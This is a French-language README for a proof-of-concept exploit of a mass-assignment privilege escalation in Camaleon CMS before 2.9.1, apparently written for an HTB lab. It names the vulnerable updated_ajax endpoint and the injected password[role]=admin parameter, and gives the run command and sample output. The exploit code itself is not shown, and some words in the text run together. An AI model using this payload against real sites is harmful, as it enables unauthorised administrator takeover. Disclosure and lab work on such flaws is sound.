
Preuve de concept d'exploitation pour une vulnérabilité d'escalade de privilèges par affectation massive dans Camaleon CMS < 2.9.1. Les utilisateurs authentifiés à faibles privilèges peuvent escalader vers le rôle administrateur en injectant des paramètres de rôle.
Vulnérabilité d'élévation de privilèges dans Camaleon CMS < 2.9.1. Le point de terminaison
updated_ajaxdansUsersControllerappelleparams.require(:password).permit!sans filtrage, permettant l'attribution de masse de n'importe quel paramètre. Un utilisateur authentifié avec de faibles privilèges peut devenir administrateur en injectantpassword[role]=adminlors d'une demande de changement de mot de passe.
/admin/users/<id>/updated_ajax avec password[role]=admin injecté dans les paramètres du mot de passe.python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests beautifulsoup4
python3 exploit.py http://TARGET -u USER -p PASS
Exemple :
$ python3 exploit.py http://facts.htb -u esteban -p password123
[*] Logging in as esteban...
[+] Logged in successfully
[*] User ID: 3, current role: editor
[*] Sending exploit payload...
[+] Privilege escalation successful! User is now admin.
[+] Login at http://facts.htb/admin with your credentials.